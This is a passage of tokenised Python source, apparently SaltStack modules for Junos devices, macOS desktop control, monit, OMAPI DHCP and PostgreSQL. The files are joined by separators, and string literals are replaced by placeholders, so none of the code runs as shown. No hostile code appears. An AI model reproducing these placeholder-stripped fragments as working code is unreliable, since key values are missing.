'<STR_LIT:_>' ) ) ( filter_reply , options = op ) <EOL> else : <EOL> ret [ '<STR_LIT:message>' ] = getattr ( conn . rpc , cmd . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) ) ( op ) <EOL> except Exception as exception : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' . format ( exception ) <EOL> ret [ '<STR_LIT>' ] = False <EOL> if '<STR_LIT>' in op : <EOL> f = open ( op [ '<STR_LIT>' ] , '<STR_LIT:w>' ) <EOL> f . write ( ret [ '<STR_LIT:message>' ] ) <EOL> f . close ( ) <EOL> return ret <EOL> def set_hostname ( hostname = None , commit_change = True ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> if hostname is None : <EOL> ret [ '<STR_LIT>' ] = False <EOL> return ret <EOL> set_string = '<STR_LIT>' . format ( hostname ) <EOL> conn . cu . load ( set_string , format = '<STR_LIT>' ) <EOL> if commit_change : <EOL> return commit ( ) <EOL> else : <EOL> ret [ '<STR_LIT>' ] = True <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' . format ( hostname ) <EOL> return ret <EOL> def commit ( ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = { } <EOL> commit_ok = conn . cu . commit_check ( ) <EOL> if commit_ok : <EOL> try : <EOL> conn . cu . commit ( confirm = True ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> except Exception as exception : <EOL> ret [ '<STR_LIT>' ] = False <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' . format ( <EOL> exception ) <EOL> else : <EOL> ret [ '<STR_LIT>' ] = False <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> return ret <EOL> def rollback ( ) : <EOL> '''<STR_LIT>''' <EOL> ret = dict ( ) <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret [ '<STR_LIT>' ] = conn . cu . rollback ( <NUM_LIT:0> ) <EOL> if ret [ '<STR_LIT>' ] : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> else : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> return ret <EOL> def diff ( ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> ret [ '<STR_LIT:message>' ] = conn . cu . diff ( ) <EOL> return ret <EOL> def ping ( ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT:message>' ] = conn . probe ( ) <EOL> if ret [ '<STR_LIT:message>' ] : <EOL> ret [ '<STR_LIT>' ] = True <EOL> else : <EOL> ret [ '<STR_LIT>' ] = False <EOL> return ret <EOL> def cli ( command = None ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT:message>' ] = conn . cli ( command ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> return ret <EOL> def shutdown ( time = <NUM_LIT:0> ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> sw = SW ( conn ) <EOL> try : <EOL> shut = sw . poweroff ( ) <EOL> shut ( time ) <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] = False <EOL> except Exception as exception : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] = False <EOL> return ret <EOL> def install_config ( path = None , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> if '<STR_LIT>' in kwargs : <EOL> conn . timeout = kwargs [ '<STR_LIT>' ] <EOL> options = { '<STR_LIT:path>' : path } <EOL> try : <EOL> conn . cu . load ( ** options ) <EOL> conn . cu . pdiff ( ) <EOL> except Exception as exception : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' . format ( <EOL> exception ) <EOL> ret [ '<STR_LIT>' ] = False <EOL> if conn . cu . commit_check ( ) : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> conn . cu . commit ( ) <EOL> else : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] = False <EOL> conn . cu . rollback ( ) <EOL> return ret <EOL> def zeroize ( ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> try : <EOL> conn . cli ( '<STR_LIT>' ) <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> except Exception as exception : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' . format ( exception ) <EOL> ret [ '<STR_LIT>' ] = False <EOL> return ret <EOL> def install_os ( path = None , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> if '<STR_LIT>' in kwargs : <EOL> conn . timeout = kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> install = conn . sw . install ( path , progress = True ) <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> except Exception as exception : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' . format ( exception ) <EOL> ret [ '<STR_LIT>' ] = False <EOL> if '<STR_LIT>' in kwargs and kwargs [ '<STR_LIT>' ] is True : <EOL> rbt = conn . sw . reboot ( ) <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' <EOL> return ret <EOL> def file_copy ( src = None , dest = None ) : <EOL> '''<STR_LIT>''' <EOL> conn = __proxy__ [ '<STR_LIT>' ] ( ) <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT>' ] = True <EOL> try : <EOL> with SCP ( conn , progress = True ) as scp : <EOL> scp . put ( src , dest ) <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' . format ( <EOL> src , dest ) <EOL> except Exception as exception : <EOL> ret [ '<STR_LIT:message>' ] = '<STR_LIT>' . format ( exception ) <EOL> ret [ '<STR_LIT>' ] = False <EOL> return ret </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import salt . utils <EOL> from salt . exceptions import CommandExecutionError <EOL> __virtualname__ = '<STR_LIT>' <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if salt . utils . is_darwin ( ) : <EOL> return __virtualname__ <EOL> return False , '<STR_LIT>' <EOL> def get_output_volume ( ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' <EOL> call = __salt__ [ '<STR_LIT>' ] ( <EOL> cmd , <EOL> output_loglevel = '<STR_LIT>' , <EOL> python_shell = False <EOL> ) <EOL> _check_cmd ( call ) <EOL> return call . get ( '<STR_LIT>' ) <EOL> def set_output_volume ( volume ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' . format ( volume ) <EOL> call = __salt__ [ '<STR_LIT>' ] ( <EOL> cmd , <EOL> output_loglevel = '<STR_LIT>' , <EOL> python_shell = False <EOL> ) <EOL> _check_cmd ( call ) <EOL> return get_output_volume ( ) <EOL> def screensaver ( ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' <EOL> call = __salt__ [ '<STR_LIT>' ] ( <EOL> cmd , <EOL> output_loglevel = '<STR_LIT>' , <EOL> python_shell = False <EOL> ) <EOL> _check_cmd ( call ) <EOL> return True <EOL> def lock ( ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' <EOL> call = __salt__ [ '<STR_LIT>' ] ( <EOL> cmd , <EOL> output_loglevel = '<STR_LIT>' , <EOL> python_shell = False <EOL> ) <EOL> _check_cmd ( call ) <EOL> return True <EOL> def say ( * words ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' . format ( '<STR_LIT:U+0020>' . join ( words ) ) <EOL> call = __salt__ [ '<STR_LIT>' ] ( <EOL> cmd , <EOL> output_loglevel = '<STR_LIT>' , <EOL> python_shell = False <EOL> ) <EOL> _check_cmd ( call ) <EOL> return True <EOL> def _check_cmd ( call ) : <EOL> '''<STR_LIT>''' <EOL> if call [ '<STR_LIT>' ] != <NUM_LIT:0> : <EOL> comment = '<STR_LIT>' <EOL> std_err = call . get ( '<STR_LIT>' ) <EOL> std_out = call . get ( '<STR_LIT>' ) <EOL> if std_err : <EOL> comment += std_err <EOL> if std_out : <EOL> comment += std_out <EOL> raise CommandExecutionError ( '<STR_LIT>' . format ( comment ) ) <EOL> return call </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import re <EOL> import salt . utils <EOL> __func_alias__ = { <EOL> '<STR_LIT>' : '<STR_LIT:id>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def __virtual__ ( ) : <EOL> if salt . utils . which ( '<STR_LIT>' ) is not None : <EOL> return True <EOL> return ( False , '<STR_LIT>' ) <EOL> def start ( name ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' . format ( name ) <EOL> return not __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) <EOL> def stop ( name ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' . format ( name ) <EOL> return not __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) <EOL> def restart ( name ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' . format ( name ) <EOL> return not __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) <EOL> def unmonitor ( name ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' . format ( name ) <EOL> return not __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) <EOL> def monitor ( name ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' . format ( name ) <EOL> return not __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) <EOL> def summary ( svc_name = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> cmd = '<STR_LIT>' <EOL> res = __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> for line in res : <EOL> if '<STR_LIT>' in line : <EOL> return dict ( monit = '<STR_LIT>' , result = False ) <EOL> elif not line or svc_name not in line or '<STR_LIT>' in line : <EOL> continue <EOL> else : <EOL> parts = line . split ( '<STR_LIT>' ) <EOL> if len ( parts ) == <NUM_LIT:3> : <EOL> resource , name , status_ = ( <EOL> parts [ <NUM_LIT:0> ] . strip ( ) , parts [ <NUM_LIT:1> ] , parts [ <NUM_LIT:2> ] . strip ( ) <EOL> ) <EOL> if svc_name != '<STR_LIT>' and svc_name != name : <EOL> continue <EOL> if resource not in ret : <EOL> ret [ resource ] = { } <EOL> ret [ resource ] [ name ] = status_ <EOL> return ret <EOL> def status ( svc_name = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' <EOL> res = __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> prostr = '<STR_LIT>' + '<STR_LIT:U+0020>' * <NUM_LIT> <EOL> s = res . replace ( '<STR_LIT>' , prostr ) . replace ( "<STR_LIT:'>" , '<STR_LIT>' ) . split ( '<STR_LIT>' ) <EOL> entries = { } <EOL> for process in s [ <NUM_LIT:1> : - <NUM_LIT:1> ] : <EOL> pro = process . splitlines ( ) <EOL> tmp = { } <EOL> for items in pro : <EOL> key = items [ : <NUM_LIT> ] . strip ( ) <EOL> tmp [ key ] = items [ <NUM_LIT> : ] . strip ( ) <EOL> entries [ pro [ <NUM_LIT:0> ] . split ( ) [ <NUM_LIT:1> ] ] = tmp <EOL> if svc_name == '<STR_LIT>' : <EOL> ret = entries <EOL> else : <EOL> ret = entries . get ( svc_name , '<STR_LIT>' ) <EOL> return ret <EOL> def reload_ ( ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' <EOL> return not __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) <EOL> def configtest ( ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> cmd = '<STR_LIT>' <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> if out [ '<STR_LIT>' ] != <NUM_LIT:0> : <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] = out [ '<STR_LIT>' ] <EOL> ret [ '<STR_LIT:result>' ] = False <EOL> return ret <EOL> ret [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> ret [ '<STR_LIT>' ] = out [ '<STR_LIT>' ] <EOL> ret [ '<STR_LIT:result>' ] = True <EOL> return ret <EOL> def version ( ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd ) . splitlines ( ) <EOL> ret = out [ <NUM_LIT:0> ] . split ( ) <EOL> return ret [ - <NUM_LIT:1> ] <EOL> def id_ ( reset = False ) : <EOL> '''<STR_LIT>''' <EOL> if reset : <EOL> id_pattern = re . compile ( r'<STR_LIT>' ) <EOL> cmd = '<STR_LIT>' <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = True ) <EOL> ret = id_pattern . search ( out [ '<STR_LIT>' ] ) . group ( '<STR_LIT:id>' ) <EOL> return ret if ret else False <EOL> else : <EOL> cmd = '<STR_LIT>' <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> ret = out . split ( '<STR_LIT::>' ) [ - <NUM_LIT:1> ] . strip ( ) <EOL> return ret <EOL> def validate ( ) : <EOL> '''<STR_LIT>''' <EOL> cmd = '<STR_LIT>' <EOL> return not __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> import struct <EOL> log = logging . getLogger ( __name__ ) <EOL> try : <EOL> import pypureomapi as omapi <EOL> omapi_support = True <EOL> except ImportError as e : <EOL> omapi_support = False <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if omapi_support : <EOL> return '<STR_LIT>' <EOL> return ( False , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def _conn ( ) : <EOL> server_ip = __pillar__ . get ( '<STR_LIT>' , <EOL> __opts__ . get ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' ) ) <EOL> server_port = __pillar__ . get ( '<STR_LIT>' , <EOL> __opts__ . get ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> key = __pillar__ . get ( '<STR_LIT>' , <EOL> __opts__ . get ( '<STR_LIT>' , None ) ) <EOL> username = __pillar__ . get ( '<STR_LIT>' , <EOL> __opts__ . get ( '<STR_LIT>' , None ) ) <EOL> return omapi . Omapi ( server_ip , server_port , username = username , key = key ) <EOL> def add_host ( mac , name = None , ip = None , ddns = False , group = None , <EOL> supersede_host = False ) : <EOL> '''<STR_LIT>''' <EOL> statements = '<STR_LIT>' <EOL> o = _conn ( ) <EOL> msg = omapi . OmapiMessage . open ( b'<STR_LIT:host>' ) <EOL> msg . message . append ( ( '<STR_LIT>' , struct . pack ( '<STR_LIT>' , <NUM_LIT:1> ) ) ) <EOL> msg . message . append ( ( '<STR_LIT>' , struct . pack ( '<STR_LIT>' , <NUM_LIT:1> ) ) ) <EOL> msg . obj . append ( ( '<STR_LIT>' , omapi . pack_mac ( mac ) ) ) <EOL> msg . obj . append ( ( '<STR_LIT>' , struct . pack ( '<STR_LIT>' , <NUM_LIT:1> ) ) ) <EOL> if ip : <EOL> msg . obj . append ( ( '<STR_LIT>' , omapi . pack_ip ( ip ) ) ) <EOL> if name : <EOL> msg . obj . append ( ( '<STR_LIT:name>' , name ) ) <EOL> if group : <EOL> msg . obj . append ( ( '<STR_LIT>' , group ) ) <EOL> if supersede_host : <EOL> statements += '<STR_LIT>' . format ( name ) <EOL> if ddns and name : <EOL> statements += '<STR_LIT>' . format ( name ) <EOL> if statements : <EOL> msg . obj . append ( ( '<STR_LIT>' , statements ) ) <EOL> response = o . query_server ( msg ) <EOL> if response . opcode != omapi . OMAPI_OP_UPDATE : <EOL> return False <EOL> return True <EOL> def delete_host ( mac = None , name = None ) : <EOL> '''<STR_LIT>''' <EOL> if not ( mac or name ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> o = _conn ( ) <EOL> msg = omapi . OmapiMessage . open ( b'<STR_LIT:host>' ) <EOL> if mac : <EOL> msg . obj . append ( ( '<STR_LIT>' , omapi . pack_mac ( mac ) ) ) <EOL> msg . obj . append ( ( '<STR_LIT>' , struct . pack ( '<STR_LIT>' , <NUM_LIT:1> ) ) ) <EOL> if name : <EOL> msg . obj . append ( ( '<STR_LIT:name>' , name ) ) <EOL> response = o . query_server ( msg ) <EOL> if response . opcode != omapi . OMAPI_OP_UPDATE : <EOL> return None <EOL> if response . handle == <NUM_LIT:0> : <EOL> return False <EOL> response = o . query_server ( omapi . OmapiMessage . delete ( response . handle ) ) <EOL> if response . opcode != omapi . OMAPI_OP_STATUS : <EOL> return False <EOL> return True </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import datetime <EOL> import distutils . version <EOL> import logging <EOL> import hashlib <EOL> import os <EOL> import re <EOL> import pipes <EOL> import tempfile <EOL> try : <EOL> import csv <EOL> HAS_CSV = True <EOL> except ImportError : <EOL> HAS_CSV = False <EOL> import salt . utils <EOL> import salt . utils . itertools <EOL> from salt . exceptions import SaltInvocationError <EOL> import salt . ext . six as six <EOL> from salt . ext . six . moves import zip <EOL> from salt . ext . six . moves import StringIO <EOL> log = logging . getLogger ( __name__ ) <EOL> _DEFAULT_PASSWORDS_ENCRYPTION = True <EOL> _EXTENSION_NOT_INSTALLED = '<STR_LIT>' <EOL> _EXTENSION_INSTALLED = '<STR_LIT>' <EOL> _EXTENSION_TO_UPGRADE = '<STR_LIT>' <EOL> _EXTENSION_TO_MOVE = '<STR_LIT>' <EOL> _EXTENSION_FLAGS = ( <EOL> _EXTENSION_NOT_INSTALLED , <EOL> _EXTENSION_INSTALLED , <EOL> _EXTENSION_TO_UPGRADE , <EOL> _EXTENSION_TO_MOVE , <EOL> ) <EOL> _PRIVILEGES_MAP = { <EOL> '<STR_LIT:a>' : '<STR_LIT>' , <EOL> '<STR_LIT:C>' : '<STR_LIT>' , <EOL> '<STR_LIT:D>' : '<STR_LIT>' , <EOL> '<STR_LIT:c>' : '<STR_LIT>' , <EOL> '<STR_LIT:t>' : '<STR_LIT>' , <EOL> '<STR_LIT:r>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:T>' : '<STR_LIT>' , <EOL> '<STR_LIT:w>' : '<STR_LIT>' , <EOL> '<STR_LIT:X>' : '<STR_LIT>' , <EOL> '<STR_LIT:x>' : '<STR_LIT>' , <EOL> '<STR_LIT:d>' : '<STR_LIT>' , <EOL> '<STR_LIT:*>' : '<STR_LIT>' , <EOL> } <EOL> _PRIVILEGES_OBJECTS = frozenset ( <EOL> ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ) <EOL> _PRIVILEGE_TYPE_MAP = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:C>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if all ( ( salt . utils . which ( '<STR_LIT>' ) , HAS_CSV ) ) : <EOL> return True <EOL> return ( False , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def _run_psql ( cmd , runas = None , password = None , host = None , port = None , user = None ) : <EOL> '''<STR_LIT>''' <EOL> kwargs = { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> if runas is None : <EOL> if not host : <EOL> host = __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' ) <EOL> if not host or host . startswith ( '<STR_LIT:/>' ) : <EOL> if '<STR_LIT>' in __grains__ [ '<STR_LIT>' ] : <EOL> runas = '<STR_LIT>' <EOL> if '<STR_LIT>' in __grains__ [ '<STR_LIT>' ] : <EOL> runas = '<STR_LIT>' <EOL> else : <EOL> runas = '<STR_LIT>' <EOL> if user is None : <EOL> user = runas <EOL> if runas : <EOL> kwargs [ '<STR_LIT>' ] = runas <EOL> if password is None : <EOL> password = __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' ) <EOL> if password is not None : <EOL> pgpassfile = salt . utils . mkstemp ( text = True ) <EOL> with salt . utils . fopen ( pgpassfile , '<STR_LIT:w>' ) as fp_ : <EOL> fp_ . write ( '<STR_LIT>' . format ( <EOL> '<STR_LIT:localhost>' if not host or host . startswith ( '<STR_LIT:/>' ) else host , <EOL> port if port else '<STR_LIT:*>' , <EOL> user if user else '<STR_LIT:*>' , <EOL> password , <EOL> ) ) <EOL> __salt__ [ '<STR_LIT>' ] ( pgpassfile , runas , '<STR_LIT>' ) <EOL> kwargs [ '<STR_LIT>' ] = { '<STR_LIT>' : pgpassfile } <EOL> ret = __salt__ [ '<STR_LIT>' ] ( cmd , python_shell = False , ** kwargs ) <EOL> if ret . get ( '<STR_LIT>' , <NUM_LIT:0> ) != <NUM_LIT:0> : <EOL> log . error ( '<STR_LIT>' ) <EOL> if password is not None and not __salt__ [ '<STR_LIT>' ] ( pgpassfile ) : <EOL> log . warning ( '<STR_LIT>' ) <EOL> return ret <EOL> def _run_initdb ( name , <EOL> auth = '<STR_LIT:password>' , <EOL> user = None , <EOL> password = None , <EOL> encoding = '<STR_LIT>' , <EOL> locale = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if runas is None : <EOL> if '<STR_LIT>' in __grains__ [ '<STR_LIT>' ] : <EOL> runas = '<STR_LIT>' <EOL> if '<STR_LIT>' in __grains__ [ '<STR_LIT>' ] : <EOL> runas = '<STR_LIT>' <EOL> else : <EOL> runas = '<STR_LIT>' <EOL> if user is None : <EOL> user = runas <EOL> cmd = [ <EOL> salt . utils . which ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' . format ( name ) , <EOL> '<STR_LIT>' . format ( user ) , <EOL> '<STR_LIT>' . format ( auth ) , <EOL> '<STR_LIT>' . format ( encoding ) , <EOL> ] <EOL> if locale is not None : <EOL> cmd . append ( '<STR_LIT>' . format ( locale ) ) <EOL> if password is not None : <EOL> pgpassfile = salt . utils . mkstemp ( text = True ) <EOL> with salt . utils . fopen ( pgpassfile , '<STR_LIT:w>' ) as fp_ : <EOL> fp_ . write ( '<STR_LIT>' . format ( password ) ) <EOL> __salt__ [ '<STR_LIT>' ] ( pgpassfile , runas , '<STR_LIT>' ) <EOL> cmd . extend ( [ <EOL> '<STR_LIT>' . format ( pgpassfile ) , <EOL> ] ) <EOL> kwargs = dict ( runas = runas , clean_env = True ) <EOL> cmdstr = '<STR_LIT:U+0020>' . join ( [ pipes . quote ( c ) for c in cmd ] ) <EOL> ret = __salt__ [ '<STR_LIT>' ] ( cmdstr , python_shell = False , ** kwargs ) <EOL> if ret . get ( '<STR_LIT>' , <NUM_LIT:0> ) != <NUM_LIT:0> : <EOL> log . error ( '<STR_LIT>' ) <EOL> if password is not None and not __salt__ [ '<STR_LIT>' ] ( pgpassfile ) : <EOL> log . warning ( '<STR_LIT>' ) <EOL> return ret <EOL> def version ( user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> query = '<STR_LIT>' '<STR_LIT>' <EOL> cmd = _psql_cmd ( '<STR_LIT:-c>' , query , <EOL> '<STR_LIT>' , <EOL> host = host , <EOL> user = user , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> ret = _run_psql ( <EOL> cmd , runas = runas , password = password , host = host , port = port , user = user ) <EOL> for line in salt . utils . itertools . split ( ret [ '<STR_LIT>' ] , '<STR_LIT:\n>' ) : <EOL> return line <EOL> def _parsed_version ( user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> psql_version = version ( <EOL> user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas , <EOL> ) <EOL> if psql_version : <EOL> return distutils . version . LooseVersion ( psql_version ) <EOL> else : <EOL> log . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return None <EOL> def _connection_defaults ( user = None , host = None , port = None , maintenance_db = None , <EOL> password = None ) : <EOL> '''<STR_LIT>''' <EOL> if not user : <EOL> user = __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' ) <EOL> if not host : <EOL> host = __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' ) <EOL> if not port : <EOL> port = __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' ) <EOL> if not maintenance_db : <EOL> maintenance_db = __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' ) <EOL> if password is None : <EOL> password = __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' ) <EOL> return ( user , host , port , maintenance_db , password ) <EOL> def _psql_cmd ( * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> ( user , host , port , maintenance_db , password ) = _connection_defaults ( <EOL> kwargs . get ( '<STR_LIT:user>' ) , <EOL> kwargs . get ( '<STR_LIT:host>' ) , <EOL> kwargs . get ( '<STR_LIT:port>' ) , <EOL> kwargs . get ( '<STR_LIT>' ) , <EOL> kwargs . get ( '<STR_LIT:password>' ) ) <EOL> cmd = [ salt . utils . which ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> if user : <EOL> cmd += [ '<STR_LIT>' , user ] <EOL> if host : <EOL> cmd += [ '<STR_LIT>' , host ] <EOL> if port : <EOL> cmd += [ '<STR_LIT>' , str ( port ) ] <EOL> if not maintenance_db : <EOL> maintenance_db = '<STR_LIT>' <EOL> cmd . extend ( [ '<STR_LIT>' , maintenance_db ] ) <EOL> cmd . extend ( args ) <EOL> return cmd <EOL> def _psql_prepare_and_run ( cmd , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None , <EOL> user = None ) : <EOL> rcmd = _psql_cmd ( <EOL> host = host , user = user , port = port , <EOL> maintenance_db = maintenance_db , password = password , <EOL> * cmd ) <EOL> cmdret = _run_psql ( <EOL> rcmd , runas = runas , password = password , host = host , port = port , user = user ) <EOL> return cmdret <EOL> def psql_query ( query , user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = [ ] <EOL> csv_query = '<STR_LIT>' . format ( <EOL> query . strip ( ) . rstrip ( '<STR_LIT:;>' ) ) <EOL> cmdret = _psql_prepare_and_run ( [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:-c>' , csv_query ] , <EOL> runas = runas , <EOL> host = host , user = user , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> if cmdret [ '<STR_LIT>' ] > <NUM_LIT:0> : <EOL> return ret <EOL> csv_file = StringIO ( cmdret [ '<STR_LIT>' ] ) <EOL> header = { } <EOL> for row in csv . reader ( csv_file , delimiter = '<STR_LIT:U+002C>' , quotechar = '<STR_LIT:">' ) : <EOL> if not row : <EOL> continue <EOL> if not header : <EOL> header = row <EOL> continue <EOL> ret . append ( dict ( zip ( header , row ) ) ) <EOL> return ret <EOL> def db_list ( user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> query = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> rows = psql_query ( query , runas = runas , host = host , user = user , <EOL> port = port , maintenance_db = maintenance_db , <EOL> password = password ) <EOL> for row in rows : <EOL> ret [ row [ '<STR_LIT:Name>' ] ] = row <EOL> ret [ row [ '<STR_LIT:Name>' ] ] . pop ( '<STR_LIT:Name>' ) <EOL> return ret <EOL> def db_exists ( name , user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> databases = db_list ( user = user , host = host , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , runas = runas ) <EOL> return name in databases <EOL> def db_create ( name , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> tablespace = None , <EOL> encoding = None , <EOL> lc_collate = None , <EOL> lc_ctype = None , <EOL> owner = None , <EOL> template = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> 